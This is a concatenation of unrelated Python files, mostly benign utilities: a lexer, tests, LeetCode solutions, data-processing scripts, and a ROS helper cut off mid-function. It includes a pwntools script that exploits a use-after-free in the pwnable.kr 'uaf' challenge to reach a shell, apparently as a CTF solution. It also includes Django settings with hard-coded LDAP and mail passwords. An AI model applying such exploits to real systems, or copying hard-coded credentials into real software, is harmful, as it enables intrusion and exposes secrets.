      return type(self.text)()

  def next(self):
    ''' Move on to the next character in the scanned text. '''
    char = self.char
    if char == '\n':
      self.lineno += 1
      self.colno = 0
    else:
      self.colno += 1
    self.index += 1

  def next_get(self):
    ''' Like `next()` but returns the new character. '''
    self.next()
    return self.char

  def restore(self, cursor):
    ''' Moves the scanner back (or forward) to the specified cursor. '''
    if not isinstance(cursor, Cursor):
      raise TypeError('expected Cursor object', type(cursor))
    self.index, self.lineno, self.colno = cursor
def readline(scanner):
  ''' Reads a full line from the *scanner* and returns it. This is
  fast over using `Scanner.next()` to the line-feed. The resulting
  string contains the line-feed character if present. '''
  begin = scanner.index
  # str.find scans for the next line-feed at C speed.
  newline_pos = scanner.text.find('\n', begin)
  if newline_pos < 0:
    stop = len(scanner.text)
  else:
    stop = newline_pos + 1  # include the line-feed in the result
  line = scanner.text[begin:stop]
  scanner.index = stop
  if line.endswith('\n'):
    scanner.lineno += 1
    scanner.colno = 0
  else:
    scanner.colno += stop - begin
  return line
def match(scanner, regex, flags=0):
  ''' Matches the specified *regex* from the current character of the
  *scanner* and returns a match object or None if it didn't match. The
  Scanners column and line numbers are updated respectively. '''
  pattern = re.compile(regex, flags) if isinstance(regex, str) else regex
  result = pattern.match(scanner.text, scanner.index)
  if result is None:
    return None
  begin, stop = result.span()
  newline_count = scanner.text.count('\n', begin, stop)
  scanner.index = stop
  if newline_count:
    # Column restarts after the last consumed line-feed.
    scanner.lineno += newline_count
    scanner.colno = stop - scanner.text.rfind('\n', begin, stop) - 1
  else:
    scanner.colno += stop - begin
  return result
class Lexer(object):
  ''' This class is used to split text into `Token`s using a
  `Scanner` and a list of `Rule`s. If *raise_invalid* is True, it
  raises an `TokenizationError` instead of yielding an invalid
  `Token` object.

  @param scanner The `Scanner` to use for lexing.
  @param rules A list of `Rule` objects.
  @param raise_invalid True if an exception should be raised when
    the stream can not be tokenized, False if it should just yield
    an invalid token and proceed with the next character.
  @attr scanner
  @attr rules
  @attr rules_map A dictionary mapping the rule name to the rule
    object. This is automatically built when the Lexer is created.
    If the `rules` are updated in the lexer directly, `update()`
    must be called.
  @attr skippable_rules A list of skippable rules built from the
    `rules` list. `update()` must be called if any of the rules
    or rules list are modified.
  @attr raise_invalid
  @attr skip_rules A set of rule type IDs that will automatically
    be skipped by the `next()` method.
  @attr token The current `Token`. After the Lexer is created and
    the `next()` method has not been called, the value of this
    attribute is None. At the end of the input, the token is of
    type `eof`.
  '''

  def __init__(self, scanner, rules=None, raise_invalid=True):
    super(Lexer, self).__init__()
    self.scanner = scanner
    self.rules = list(rules) if rules else []
    self.update()
    self.raise_invalid = raise_invalid
    self.token = None

  def __repr__(self):
    ctok = self.token.type if self.token else None
    return '<Lexer with current token {0!r}>'.format(ctok)

  def __iter__(self):
    # Lazily tokenizes the whole input, stopping before the eof token.
    if not self.token:
      self.next()
    while not self.token.type == eof:
      yield self.token
      self.next()

  def __bool__(self):
    # Falsy once the eof token has been produced.
    if self.token and self.token.type == eof:
      return False
    return True

  __nonzero__ = __bool__  # Python 2

  def update(self):
    ''' Updates the `rules_map` dictionary and `skippable_rules` list
    based on the `rules` list.

    Raises:
      ValueError: if a rule name is duplicate
      TypeError: if an item in the `rules` list is not a rule. '''
    self.rules_map = {}
    self.skippable_rules = []
    for rule in self.rules:
      if not isinstance(rule, Rule):
        raise TypeError('item must be Rule instance', type(rule))
      if rule.name in self.rules_map:
        raise ValueError('duplicate rule name', rule.name)
      self.rules_map[rule.name] = rule
      if rule.skip:
        self.skippable_rules.append(rule)

  def expect(self, *names):
    ''' Checks if the _current_ token matches one of the specified
    token type names and raises `UnexpectedTokenError` if it does not. '''
    if not names:
      return
    if not self.token or self.token.type not in names:
      raise UnexpectedTokenError(names, self.token)

  def accept(self, *names, **kwargs):
    ''' Extracts a token of one of the specified rule names and doesn't
    error if unsuccessful. Skippable tokens might still be skipped by
    this method.

    Raises:
      ValueError: if a rule with the specified name doesn't exist. '''
    return self.next(*names, as_accept=True, **kwargs)

  def next(self, *expectation, **kwargs):
    ''' Parse the next token from the input and return it. If
    `raise_invalid` is True, this method can raise `TokenizationError`.
    The new token can also be accessed from the `token` attribute
    after the method was called.

    If one or more arguments are specified, they must be rule names
    that are to be expected at the current position. They will be
    attempted to be matched first (in the specicied order). If the
    expectation could not be met, a `UnexpectedTokenError` is raised.
    An expected Token will not be skipped, even if its rule says so.

    Arguments:
      \*expectation: The name of one or more rules that are expected
        from the current context of the parser. If empty, the first
        matching token of all rules will be returned. Skippable tokens
        will always be skipped unless specified as argument.
      as_accept=False: If passed True, this method behaves
        the same as the `accept()` method.
      weighted=False: If passed True, the *\*expectation* tokens
        are checked before the default token order.

    Raises:
      ValueError: if an expectation doesn't match with a rule name.
      UnexpectedTokenError: if an expectation is given and the
        expectation wasn't fulfilled.
      TokenizationError: if a token could not be generated from
        the current position of the Scanner and `raise_invalid`
        is True.
    '''
    as_accept = kwargs.pop('as_accept', False)
    weighted = kwargs.pop('weighted', False)
    for key in kwargs:
      raise TypeError('unexpected keyword argument {0!r}'.format(key))

    # Once eof is reached, keep returning (or rejecting) the eof token
    # without touching the scanner again.
    if self.token and self.token.type == eof:
      if not as_accept and expectation and eof not in expectation:
        raise UnexpectedTokenError(expectation, self.token)
      elif as_accept and eof in expectation:
        return self.token
      elif as_accept:
        return None
      return self.token

    token = None
    while token is None:
      # Stop if we reached the end of the input.
      cursor = self.scanner.cursor
      if not self.scanner:
        token = Token(eof, cursor, None)
        break

      value = None
      # Try to match the expected tokens.
      if weighted:
        for rule_name in expectation:
          if rule_name == eof:
            continue
          rule = self.rules_map.get(rule_name)
          if rule is None:
            raise ValueError('unknown rule', rule_name)
          value = rule.tokenize(self.scanner)
          if value:
            break
          # Failed attempts must not consume input.
          self.scanner.restore(cursor)

      # Match the rest of the rules, but only if we're not acting
      # like the accept() method that doesn't need the next token
      # for raising an UnexpectedTokenError.
      if not value:
        if as_accept and weighted:
          # Check only skippable rules if we're only trying to accept
          # a certain token type and may consume any skippable tokens
          # until then.
          check_rules = self.skippable_rules
        else:
          check_rules = self.rules
        for rule in check_rules:
          if weighted and expectation and rule.name in expectation:
            # Skip rules that we already tried.
            continue
          value = rule.tokenize(self.scanner)
          if value:
            break
          self.scanner.restore(cursor)

      if not value:
        if as_accept:
          return None
        # No rule matched: produce an invalid token (type None).
        token = Token(None, cursor, self.scanner.char)
      else:
        assert rule, "we should have a rule by now"
        # A rule may return a ready-made Token or just a value.
        if type(value) is not Token:
          value = Token(rule.name, cursor, value)
        token = value
        expected = rule.name in expectation
        if not expected and rule.skip:
          # If we didn't expect this rule to match, and if its skippable,
          # just skip it. :-)
          token = None
        elif not expected and as_accept:
          # If we didn't expect this rule to match but are just accepting
          # instead of expecting, restore to the original location and stop.
          self.scanner.restore(cursor)
          return None

    self.token = token
    if as_accept and token and token.type == eof:
      if eof in expectation:
        return token
      return None
    if token.type is None:
      raise TokenizationError(token)
    if not as_accept and expectation and token.type not in expectation:
      raise UnexpectedTokenError(expectation, token)
    assert not as_accept or (token and token.type in expectation)
    return token
class Rule(object):
  ''' Abstract base for rule objects capable of extracting a `Token`
  from the current position of a `Scanner`. '''

  def __init__(self, name, skip=False):
    super(Rule, self).__init__()
    self.name = name
    self.skip = skip

  def tokenize(self, scanner):
    ''' Attempt to read a token for this rule at the *scanner*'s current
    position and return it. A non-`Token` return value is used as the
    token's value; anything falsy means the rule did not match. The
    `Token.value` need not be a string — it may be any (complex) data
    type, as long as the user knows about it and handles the token
    specially. '''
    raise NotImplementedError
class Regex(Rule):
  ''' A rule matching a regular expression. The `Token` generated by
  this rule carries the `re` match object as its value. '''

  def __init__(self, name, regex, flags=0, skip=False):
    super(Regex, self).__init__(name, skip)
    if isinstance(regex, string_types):
      regex = re.compile(regex, flags)
    self.regex = regex

  def tokenize(self, scanner):
    found = match(scanner, self.regex)
    # Zero-width matches are rejected so the lexer always makes progress.
    if found is None or found.start() == found.end():
      return None
    return found
class Keyword(Rule):
  ''' Matches an exact string (optionally case insensitive) from the
  scanner's current position. '''

  def __init__(self, name, string, case_sensitive=True, skip=False):
    super(Keyword, self).__init__(name, skip)
    self.string = string
    self.case_sensitive = case_sensitive

  def tokenize(self, scanner):
    expected = self.string if self.case_sensitive else self.string.lower()
    current = scanner.char
    consumed = type(current)()  # empty str/unicode matching the text type
    for expected_char in expected:
      if not self.case_sensitive:
        current = current.lower()
      if current != expected_char:
        return None
      consumed += current
      current = scanner.next_get()
    return consumed
class Charset(Rule):
  ''' Consumes a run of characters drawn from a given set. It can be
  restricted to match only at a specific column number of the scanner,
  which is useful to create a separate indentation token type apart
  from the typical whitespace token. '''

  def __init__(self, name, charset, at_column=-1, skip=False):
    super(Charset, self).__init__(name, skip)
    self.charset = frozenset(charset)
    self.at_column = at_column

  def tokenize(self, scanner):
    if self.at_column >= 0 and self.at_column != scanner.colno:
      return None
    current = scanner.char
    consumed = type(current)()
    while current and current in self.charset:
      consumed += current
      current = scanner.next_get()
    return consumed
class TokenizationError(Exception):
  ''' Raised when the stream can not be tokenized at a given position.
  Initialized with an invalid `Token` (type None) carrying the cursor
  position and the offending scanner character as its value. '''

  def __init__(self, token):
    if type(token) is not Token:
      raise TypeError('expected Token object', type(token))
    if token.type is not None:
      raise ValueError('can not be raised with a valid token')
    self.token = token

  def __str__(self):
    cursor = self.token.cursor
    return 'could not tokenize stream at {0}:{1}:{2!r}'.format(
      cursor.lineno, cursor.colno, self.token.value)
class UnexpectedTokenError(Exception):
  ''' This exception is raised when the `Lexer.next()` method was given
  one or more expected token types but the extracted token didn't match
  the expected types. '''

  def __init__(self, expectation, token):
    if not isinstance(expectation, (list, tuple)):
      message = 'expectation must be a list/tuple of rule names'
      raise TypeError(message, type(expectation))
    if len(expectation) < 1:
      raise ValueError('expectation must contain at least one item')
    if type(token) is not Token:
      raise TypeError('token must be Token object', type(token))
    if token.type is None:
      raise ValueError('can not be raised with an invalid token')
    self.expectation = expectation
    self.token = token

  def __str__(self):
    # Bugfix: the original called 'expected token '.format(lineno, colno)
    # on a literal with no placeholders, silently discarding both args.
    # The position is already reported by the trailing part of the message,
    # so the dead format call is simply removed.
    message = 'expected token '
    if len(self.expectation) == 1:
      message += '"' + self.expectation[0] + '"'
    else:
      message += '{' + ','.join(map(str, self.expectation)) + '}'
    return message + ', got "{0}" instead (value={1!r} at {2}:{3})'.format(
      self.token.type, self.token.value, self.token.cursor.lineno,
      self.token.cursor.colno)
|
import numpy as np
from . import process_image as module
def test_get_ROI_statistics():
    """Golden-value test for process_image.get_ROI_statistics on a 2x2 RGB ROI.

    NOTE(review): the expected keys suggest per-channel (R/G/B) statistics —
    mean/median/min/max/stdev, coefficient of variation, percentiles, msorm
    and outlier flags — confirm against the process_image implementation.
    """
    # fmt: off
    mock_ROI = np.array([
        [[1, 10, 100], [2, 20, 200]],
        [[3, 30, 300], [4, 40, 400]]
    ])
    # fmt: on
    actual = module.get_ROI_statistics(mock_ROI)
    expected = {
        "r_msorm": 2.5,
        "g_msorm": 25.0,
        "b_msorm": 250,
        "r_cv": 1.118033988749895 / 2.5,
        "g_cv": 11.180339887498949 / 25.0,
        "b_cv": 111.80339887498948 / 250.0,
        "r_mean": 2.5,
        "g_mean": 25.0,
        "b_mean": 250.0,
        "r_outlier_warning": False,
        "g_outlier_warning": False,
        "b_outlier_warning": False,
        "r_median": 2.5,
        "g_median": 25.0,
        "b_median": 250.0,
        "r_min": 1,
        "g_min": 10,
        "b_min": 100,
        "r_max": 4,
        "g_max": 40,
        "b_max": 400,
        "r_stdev": 1.118033988749895,
        "g_stdev": 11.180339887498949,
        "b_stdev": 111.80339887498948,
        "r_percentile_99": 3.9699999999999998,
        "g_percentile_99": 39.699999999999996,
        "b_percentile_99": 396.99999999999994,
        "r_percentile_95": 3.8499999999999996,
        "g_percentile_95": 38.5,
        "b_percentile_95": 385.0,
        "r_percentile_90": 3.7,
        "g_percentile_90": 37.0,
        "b_percentile_90": 370.0,
        "r_percentile_75": 3.25,
        "g_percentile_75": 32.5,
        "b_percentile_75": 325.0,
        "r_percentile_50": 2.5,
        "g_percentile_50": 25.0,
        "b_percentile_50": 250.0,
        "r_percentile_25": 1.75,
        "g_percentile_25": 17.5,
        "b_percentile_25": 175.0,
    }
    assert actual == expected
|
# -*- coding: utf-8 -*-
# author: kiven
import os
DEBUG = True
TIME_ZONE = 'Asia/Shanghai'
# Project root: two directories above this settings module.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, '../omsBackend.db'),
    }
}
# Enable LDAP authentication; keep the next line commented out to disable it.
# AUTHENTICATION_BACKENDS = ("django_python3_ldap.auth.LDAPBackend",)
LDAP_AUTH_URL = "ldap://192.168.6.99:389"
LDAP_AUTH_SEARCH_BASE = "ou=AllUser,dc=oms,dc=com"
LDAP_AUTH_CONNECTION_USERNAME = r'oms\admin'
LDAP_AUTH_CONNECTION_PASSWORD = r'jjyy'
# Email account settings
MAIL_ACOUNT = {
    "mail_host": "mail@oms.com",
    "mail_user": "admin@oms.com",
    "mail_pass": "jjyy",
    "mail_postfix": "oms.com",
}
# Skype account settings (disabled; placeholder value below)
#from skpy import Skype
# SK_ACOUNT = {
#     'sk_user': 'admin@oms.com',
#     'sk_pass': 'jjyy'
# }
# SK = Skype(SK_ACOUNT["sk_user"], SK_ACOUNT["sk_pass"])
SK = 'skype'
REDIS_URL = 'redis://127.0.0.1:6379/'
# Celery configuration
CELERY_BROKER_URL = REDIS_URL + '0'
# Celery result backend, used to track task results
CELERY_RESULT_BACKEND = 'django-db'
# Serialization formats for celery messages
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
# Celery timezone: reuse the TIME_ZONE configured above
CELERY_TIMEZONE = TIME_ZONE
CACHES = {
    "default": {
        "BACKEND": "django_redis.cache.RedisCache",
        "LOCATION": REDIS_URL + '1',
        "OPTIONS": {
            "CLIENT_CLASS": "django_redis.client.DefaultClient",
        }
    }
}
|
#!/usr/bin/env python3
import pwn
"""
Idea:
1. Need to delete the two instances by sending "3\n"
2. Need to feed in data through a file ./uaf <length> <file-with-length-data> and by sending "2\n"
such that the virtual table will point to a table containg the function named 'give_shell'.
But do we need to know all about how malloc and free are used to make this work?
The memory is probably added to a free-list and as such we should request memory
of the same size as the allocated classes.
3. Use the instances by sending "1\n"
At the moment introduce() is being called, rax contains the ptr to man.
At offset 8, the function for introduce() is loaded.
Thus we need to point to a place where at +8 the address of give_shell is located.
0x401570 contains the virtual table for Man, and the address of introduce is located at +8.
At +0 contains the address of give_shell. Thus if we use 0x401570-8 = 0x401568, then
+8 will contain give_shell.
We need to add our payload two times, since else only the woman instance is overwritten, and
calling man will crash.
"""
# Use a tmux split for the GDB pane when debugging.
pwn.context.terminal = ["tmux", "splitw", "-h"]
exe = pwn.context.binary = pwn.ELF('./uaf')
# Remote scratch path used to deliver the payload over ssh.
random_file = "/tmp/%s" % pwn.util.fiddling.randoms(10)
size_of_new = 8
payload_length = size_of_new
address_of_virtual_address_table = 0x401570
# vtable pointer shifted by -8 so that the slot at +8 resolves to give_shell()
# (see the module docstring above for the full derivation).
payload = pwn.p64(address_of_virtual_address_table - 8) + b'a' * (size_of_new - 8)
pwn.debug(pwn.hexdump(payload))
gdbscript = '''
# Before "delete m;"
break *0x00401082
# before "m->introduce();"
break *0x00400fe2
# before "new"
break *0x00401020
continue
'''
if pwn.args.GDB:
    pwn.write('/tmp/payload', payload)
    p = pwn.gdb.debug([exe.path, str(payload_length), '/tmp/payload'], gdbscript=gdbscript)
elif pwn.args.LOCAL:
    pwn.write('/tmp/payload', payload)
    p = pwn.process([exe.path, str(payload_length), '/tmp/payload'])
else:
    # Default: run on the remote pwnable.kr host.
    io = pwn.ssh("uaf", "pwnable.kr", 2222, "guest")
    io.upload_data(payload, random_file)
    p = io.process(["./uaf", str(payload_length), random_file])
# Menu protocol: 3 = free both objects, 2 (twice) = reallocate both chunks
# with our payload, 1 = use-after-free -> virtual call lands in give_shell().
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('3')
for x in range(0, 2):
    p.recvuntil('1. use\n2. after\n3. free\n')
    p.sendline('2')
p.recvuntil('1. use\n2. after\n3. free\n')
p.sendline('1')
p.interactive()
|
class Solution(object):
    """Diagonal zig-zag traversal of a 2-D matrix (LeetCode 498)."""

    def findDiagonalOrder(self, matrix):
        """Return all elements of *matrix* in diagonal zig-zag order.

        Diagonals are indexed by d = row + col. Each diagonal is collected
        top-right to bottom-left; even diagonals are then reversed so the
        output alternates direction. The original code had an if/else whose
        branches both executed `result += inter` — the duplicate branch is
        folded away here.
        """
        if not matrix or not matrix[0]:
            return []
        result = []
        num_rows = len(matrix)
        num_cols = len(matrix[0])
        for d in range(num_rows + num_cols - 1):
            # Head of the diagonal: along the top row while d fits,
            # then down the rightmost column.
            if d < num_cols:
                row, col = 0, d
            else:
                row, col = d - num_cols + 1, num_cols - 1
            diagonal = []
            while row < num_rows and col > -1:
                diagonal.append(matrix[row][col])
                row += 1
                col -= 1
            if d % 2 == 0:
                diagonal.reverse()
            result += diagonal
        return result
class Solution(object):
    # NOTE(review): this second Solution class shadows the one defined above;
    # only this definition survives at import time.
    def findDiagonalOrder(self, matrix):
        """Diagonal zig-zag traversal (LeetCode 498), handled in two passes:
        diagonals starting on the top row, then those starting on the right
        column. The loop variable is deliberately mutated inside the while
        (Python's for re-binds it each iteration, so this is safe here)."""
        res = []
        if not matrix:
            return  # NOTE(review): returns None for empty input, not [] — confirm callers
        m = len(matrix)
        n = len(matrix[0])
        # Pass 1: diagonals whose head is on the top row (columns 0..n-1).
        for i in range(n):
            j = 0
            new = []
            rev = False
            if i%2 == 0:
                rev = True
            while 0<=j<m and 0<=i<n:
                new.append(matrix[j][i])
                j += 1
                i -= 1
            if rev == True:
                res += new[::-1]
            else:
                res += new
        # Pass 2: diagonals whose head is on the last column (rows 1..m-1).
        for i in range(1,m):
            j = n-1
            new = []
            rev = False
            # Reversal parity depends on both the matrix width and the row.
            if n%2 !=0 and i%2 == 0:
                rev = True
            if n%2 ==0 and i%2 != 0:
                rev = True
            while 0<=j<n and 0<=i<m:
                new.append(matrix[i][j])
                j -= 1
                i += 1
            if rev == True:
                res += new[::-1]
            else:
                res += new
        return res
../numpy/stats.py |
import numpy as np
from sklearn import linear_model
import pickle
import definitions
import os
from wsdm.ts.features import word2VecFeature
from wsdm.ts.helpers.regression import regression_utils
def get_data_and_labels(inputType):
    """Read the custom training file for *inputType* and build the feature
    matrix and label vector.

    Arguments:
        inputType: definitions.TYPE_NATIONALITY or definitions.TYPE_PROFESSION.
    Returns:
        (data, labels): numpy arrays of feature rows and float gold scores.
    Raises:
        ValueError: on an unknown inputType (previously this fell through and
        crashed later with NameError on `filename`) or a malformed input row
        (previously checked via `assert`, which -O strips).
    """
    if inputType == definitions.TYPE_NATIONALITY:
        filename = os.path.join(definitions.TRAINING_DIR, "custom_nationality.train")
    elif inputType == definitions.TYPE_PROFESSION:
        filename = os.path.join(definitions.TRAINING_DIR, "custom_profession.train")
    else:
        raise ValueError("Unknown input type: %r" % (inputType,))
    data = []
    labels = []
    with open(filename, encoding='utf8', mode='r') as fr:
        for line in fr:
            # Rows are TSV: person, term, gold score.
            splitted = line.rstrip().split('\t')
            if len(splitted) != 3:
                raise ValueError("Invalid input row: %r" % (line,))
            person = splitted[0]
            term = splitted[1]
            score = float(splitted[2])
            data.append(regression_utils.get_features_values(person, term, inputType, word2VecFeature))
            labels.append(score)
    return np.array(data), np.array(labels)
def train_and_save(inputType):
    """Fit a linear regression on the training data for *inputType* and
    pickle the model to its configured path.

    Raises:
        ValueError: on an unknown inputType (previously this fell through
        and crashed later with NameError on `filename`).
    """
    if inputType == definitions.TYPE_NATIONALITY:
        filename = definitions.REGRESSION_MODEL_NATIONALITY_PATH
    elif inputType == definitions.TYPE_PROFESSION:
        filename = definitions.REGRESSION_MODEL_PROFESSION_PATH
    else:
        raise ValueError("Unknown input type: %r" % (inputType,))
    data, labels = get_data_and_labels(inputType)
    # NOTE(review): `normalize=` was removed from LinearRegression in recent
    # scikit-learn releases; pin the version or move to a scaler pipeline.
    log_model = linear_model.LinearRegression(normalize=True)
    log_model.fit(data, labels)
    # `with` ensures the file handle is closed (the original leaked it).
    with open(filename, 'wb') as fh:
        pickle.dump(log_model, fh)
if __name__ == '__main__':
    # Load the word2vec model once, then train and persist both regressors.
    word2VecFeature.load_module()
    train_and_save(definitions.TYPE_NATIONALITY)
    train_and_save(definitions.TYPE_PROFESSION)
import dash_bootstrap_components as dbc
# Static example breadcrumb: two external documentation links plus the
# currently-active page.
breadcrumb = dbc.Breadcrumb(
    items=[
        {"label": "Docs", "href": "/docs", "external_link": True},
        {
            "label": "Components",
            "href": "/docs/components",
            "external_link": True,
        },
        {"label": "Breadcrumb", "active": True},
    ],
)
|
from backpack.core.derivatives.batchnorm1d import BatchNorm1dDerivatives
from .base import GradBaseModule
class GradBatchNorm1d(GradBaseModule):
    """Gradient module for BatchNorm1d: wires BackPACK's BatchNorm1d
    derivatives to the layer's 'bias' and 'weight' parameters."""

    def __init__(self):
        super().__init__(
            derivatives=BatchNorm1dDerivatives(), params=["bias", "weight"]
        )
|
#!/usr/bin/env python
import cProfile
import uproot
import awkward as ak
import pandas as pd
import argparse
import fastjet as fj
import fjext
import tqdm
class ALICEDataConfig:
    # ROOT tree paths inside the PWGHF TreeCreator output file:
    # per-event metadata and per-track particle kinematics.
    event_tree_name = "PWGHF_TreeCreator/tree_event_char"
    track_tree_name = "PWGHF_TreeCreator/tree_Particle"

    def __init__(self) -> None:
        pass
# def make_df(df):
# d = dict()
# # d["particles"] = fjext.vectorize_pt_eta_phi(df['ParticlePt'].values, df['ParticleEta'].values, df['ParticlePhi'].values)
# d["parts"] = []
# for i in range(len(df['ParticlePt'].values)):
# d["parts"].append((df['ParticlePt'].values[i],
# df['ParticleEta'].values[i],
# df['ParticlePhi'].values[i]))
# for dn in df.columns:
# if 'Particle' in dn:
# continue
# d[dn] = df[dn].values[0]
# return pd.DataFrame(d)
def make_df_not(df, dfout, args):
    """Flatten one event group and append it to the accumulator frame.

    Particle* columns keep their per-track value arrays; every other column
    is broadcast from its first (event-level) value.

    Arguments:
        df: track rows belonging to a single (run_number, ev_id) group.
        dfout: accumulator DataFrame, or None on the first call.
        args: unused; kept for interface compatibility with the caller.
    Returns:
        The accumulator with this event's flattened rows appended.
    """
    d = dict()
    for dn in df.columns:
        if 'Particle' in dn:
            d[dn] = df[dn].values
        else:
            d[dn] = df[dn].values[0]
    event_df = pd.DataFrame(d)
    if dfout is None:
        return event_df
    # DataFrame.append was removed in pandas 2.0; pd.concat is the drop-in
    # equivalent (indices are kept as-is, duplicating per-event indices
    # exactly like append did).
    return pd.concat([dfout, event_df])
def make_df(df, pbar):
    """Collapse one event's track rows into a flat DataFrame.

    Per-track Particle* columns keep their value arrays, event-level columns
    are broadcast from row 0, and the run_number/ev_id group keys are
    dropped. Advances *pbar* by one processed event.
    """
    columns = {}
    for name in df.columns:
        # The groupby keys are redundant in the flattened output.
        if "run_number" in name or "ev_id" in name:
            continue
        if 'Particle' in name:
            columns[name] = df[name].values
        else:
            columns[name] = df[name].values[0]
    flat = pd.DataFrame(columns)
    pbar.update(1)
    return flat
def process_event(df, args, pbar):
    """Per-event analysis hook: currently only advances the progress bar.

    A draft of the intended work (fastjet anti-kt clustering, R=0.4, with
    ghost-area estimation and a pt/rapidity particle selection) exists in the
    original source as commented-out code but is not part of the active path.
    """
    pbar.update(1)
# def analyze_df(df):
# for index, row in df:
# process_event(DataFrame(row))
def convert(args):
    """Convert an ALICE PWGHF ROOT file into one flat DataFrame per event
    and write the result to <input>.h5 (HDF5 key 'data').

    With args.read set, the grouped events are only iterated through
    process_event instead of being flattened and written.
    """
    with uproot.open(args.input)[ALICEDataConfig.event_tree_name] as event_tree:
        event_tree.show()
        print(event_tree.branches)
        #print(event_tree.arrays)
        event_df_orig = event_tree.arrays(library="pd")
        # keep only events that passed the rejection flag
        event_df = event_df_orig.query('is_ev_rej == 0')
        # NOTE(review): reset_index(drop=True) is not assigned back, so this
        # line has no effect -- confirm intent.
        event_df.reset_index(drop=True)
        print(event_df)
    with uproot.open(args.input)[ALICEDataConfig.track_tree_name] as track_tree:
        track_tree.show()
        track_df_orig = track_tree.arrays(library="pd")
    # Merge event info into track tree
    track_df = pd.merge(track_df_orig, event_df, on=['run_number', 'ev_id'])
    # NOTE(review): also a no-op without assignment.
    track_df.reset_index(drop=True)
    # (i) Group the track dataframe by event
    # track_df_grouped is a DataFrameGroupBy object with one track dataframe per event
    # # (ii) Transform the DataFrameGroupBy object to a SeriesGroupBy of fastjet particles
    # # df_events = track_df.groupby(['run_number', 'ev_id']).apply(make_df)
    pbar = tqdm.tqdm()
    gby = track_df.groupby(['run_number', 'ev_id'])
    if args.read:
        _df = gby.apply(process_event, args, pbar)
        pbar.close()
    else:
        dfout = None
        # dfout = gby.apply(make_df, dfout, args)
        dfout = gby.apply(make_df, pbar)
        pbar.close()
        dfout.reset_index(drop=True)
        if args.debug:
            print('writing', args.input+'.h5')
        # mode='a' appends to an existing store; complevel=9 = max compression
        dfout.to_hdf(args.input+'.h5', 'data', mode='a', complevel=9)
        # dfout.to_hdf(args.input+'.h5', 'data', mode='a', complevel=9, format='fixed', data_columns=True)
def read(args):
    """Read a previously converted .h5 file and run process_event on each
    (run_number, ev_id) event group."""
    df = pd.read_hdf(args.input, 'data')
    pbar = tqdm.tqdm()
    for rn, new_df in df.groupby(["run_number", "ev_id"]):
        process_event(new_df, args, pbar)
def main():
    """CLI entry point: convert a ROOT file to HDF5, or re-read an already
    converted .h5 file, optionally under cProfile."""
    cli = argparse.ArgumentParser()
    cli.add_argument('-i', '--input', type=str, default='', required=True)
    cli.add_argument('--mc', help="set if this is an MC file",
                     default=False, action="store_true")
    cli.add_argument('--read', help="read instead of converting", default=False, action="store_true")
    cli.add_argument('--debug', help="flag", default=False, action="store_true")
    cli.add_argument('--profile', help="cProfile", default=False, action="store_true")
    args = cli.parse_args()
    # .h5 inputs are re-read; anything else is treated as ROOT and converted
    if '.h5' in args.input:
        if args.profile:
            cProfile.run('read(args)')
        else:
            read(args)
    else:
        if args.profile:
            cProfile.run('convert(args)')
        else:
            convert(args)
# Script entry point.
if __name__ == '__main__':
    main()
|
import typing
from typing import TYPE_CHECKING
if TYPE_CHECKING: # pragma: no cover
from kerasltisubmission import AnyIDType
class KerasLTISubmissionBaseException(Exception):
    """Root of the kerasltisubmission exception hierarchy."""

    pass
class KerasLTISubmissionBadModelException(KerasLTISubmissionBaseException):
    """Marker subtype raised for problems with the submitted model."""

    pass
class KerasLTISubmissionInputException(KerasLTISubmissionBaseException):
    """Raised while loading assignment input data."""

    def __init__(self, message: typing.Optional[str] = None) -> None:
        default_message = "Exception while loading assignment input data"
        # Falsy (None or empty) messages fall back to the default text.
        super().__init__(message or default_message)
class KerasLTISubmissionNoInputException(KerasLTISubmissionInputException):
    """Raised when the provider sent no input matrices for an assignment."""

    def __init__(self, api_endpoint: str, assignment_id: "AnyIDType") -> None:
        super().__init__(
            f"The Provider at {api_endpoint} did not send any input matrices for assignment {assignment_id}"
        )
        # Keep the context around for callers that want to retry or report.
        self.api_endpoint = api_endpoint
        self.assignment_id = assignment_id
class KerasLTISubmissionException(KerasLTISubmissionBaseException):
    """Raised while submitting predictions."""

    def __init__(self) -> None:
        super().__init__("Exception while submitting predictions")
class KerasLTISubmissionInvalidSubmissionException(KerasLTISubmissionBaseException):
    """Raised for malformed prediction payloads."""

    def __init__(self, predictions: typing.Dict[str, int]) -> None:
        super().__init__(
            f"Invalid predictions: {predictions}. Must be a non-empty mapping of hashes to classes"
        )
        # Rejected payload, kept for inspection by the caller.
        self.predictions = predictions
class KerasLTISubmissionConnectionException(KerasLTISubmissionBaseException):
    """Base class for provider connectivity problems."""

    pass
class KerasLTISubmissionConnectionFailedException(
    KerasLTISubmissionConnectionException
):
    """Raised when the provider endpoint could not be reached at all."""

    def __init__(self, api_endpoint: str, exc: Exception) -> None:
        super().__init__(f"Failed to connect to provider at {api_endpoint}")
        self.api_endpoint = api_endpoint
        # The underlying low-level exception, preserved for diagnostics.
        self.exc = exc
class KerasLTISubmissionBadResponseException(KerasLTISubmissionConnectionException):
    """Raised when the provider replied with a non-success status code.

    Exposes the endpoint, status code, assignment id and provider message so
    callers can log or retry.
    """

    def __init__(
        self,
        api_endpoint: str,
        return_code: int,
        assignment_id: "AnyIDType",
        message: str,
    ) -> None:
        super().__init__(
            f"The provider at {api_endpoint} replied with bad status code {return_code} for assignment {assignment_id}: {message or 'No message'}"
        )
        self.api_endpoint = api_endpoint
        self.return_code = return_code
        # Fix: assignment_id was accepted but never stored, unlike the
        # sibling KerasLTISubmissionNoInputException which keeps it.
        self.assignment_id = assignment_id
        self.message = message
|
#!/usr/bin/env python
# coding=utf-8
# Jesus Tordesillas, jtorde@mit.edu
# date: July 2020
import math
import os
import sys
import time
import rospy
from snapstack_msgs.msg import State
import subprocess
import rostopic
def waitUntilRoscoreIsRunning():
    """Block until a roscore is reachable, probing /rosout in a loop.

    Technique borrowed from:
    https://github.com/ros-visualization/rqt_robot_plugins/blob/eb5a4f702b5b5c92b85aaf9055bf6319f42f4249/rqt_moveit/src/rqt_moveit/moveit_widget.py#L251
    """
    roscore_up = False
    while not roscore_up:
        try:
            # Succeeds only when a master is answering.
            rostopic.get_topic_class('/rosout')
            roscore_up = True
        except rostopic.ROSTopicIOException as e:
            roscore_up = False
    print("Roscore is running!")
def launchCommandAndWaitUntilFinish(command):
